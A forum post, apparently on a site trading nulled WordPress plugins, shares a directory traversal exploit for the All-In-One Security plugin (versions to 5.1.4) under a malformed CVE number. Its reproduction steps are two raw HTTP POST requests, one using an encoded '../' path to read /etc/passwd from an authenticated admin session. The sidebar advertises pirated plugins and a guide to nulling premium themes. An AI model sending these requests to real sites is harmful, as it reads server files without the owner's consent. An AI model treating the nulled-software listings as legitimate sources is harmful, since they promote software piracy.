WordPress Plugin CVE--0156

G

Gateman

New Member
Joined
June 25, 2024
Messages
4
Reaction score
1
Points
0

Vulnerability Type : Directory Traversal


Description : The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.


Steps to reproduce :
Code: 
 POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
Code: 
 POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs


To see this hidden content, you need to "Reply & React" with one of the following reactions: Like Like, Love Love, Haha Haha, Wow Wow
To see this hidden content, you need to "Reply & React" with one of the following reactions: Like Like, Love Love, Haha Haha, Wow Wow
 
You must log in or register to reply here.

Similar threads

Sauron
Mailpoet Premium v4.35.0 – WordPress Plugin NULLED
Replies
0
Views
8K
Sauron
Sauron
Sauron
[WP] easy digital downloads [V2.6.1] addons & wordpress plugin -NULLED
Replies
0
Views
7K
Sauron
Sauron
Sauron
[WP] Slider Revolution Responsive[V6.6.19] WordPress Plugin- NULLED
Replies
0
Views
6K
Sauron
Sauron
Code0
HOSTIKO WORDPRESS WHMCS VERSION 2.5.1 - 10 APRIL 2025
Replies
2
Views
4K
mxabusi666
M
Shadow Warrior
Hot! How to Null and Activate Premium WordPress Themes and Plugins [Valuable info]
2 3
Replies
51
Views
76K
delta66
D
  • Tags
    cve-0156 plugin plugin vulnerability wordpress wordpress security
    • Top